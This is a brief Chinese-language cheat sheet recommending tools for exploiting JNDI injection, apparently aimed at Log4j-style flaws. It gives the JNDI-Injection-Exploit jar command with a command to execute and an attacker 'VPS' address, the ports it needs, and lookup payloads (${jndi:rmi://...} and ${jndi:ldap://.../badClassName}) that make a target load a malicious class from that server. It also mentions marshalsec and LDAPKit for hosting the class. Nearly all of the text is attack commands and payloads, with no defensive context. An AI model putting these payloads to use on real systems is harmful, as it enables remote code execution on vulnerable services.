工具推荐
JNDI-Injection-Exploit
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "calc.exe" -A 127.0.0.1
#-C 指定要执行的命令
#-A vps的ip
#!# 1099,8180,1389三个端口不可占用
执行完毕就是常用的利用链
${jndi:rmi://127.0.0.1:1099/pfpvmj}
marshalsec
这个需要配合web服务去下载恶意lei
或者使用改进版LDAPKit
${jndi:ldap://127.0.0.1:1389/badClassName}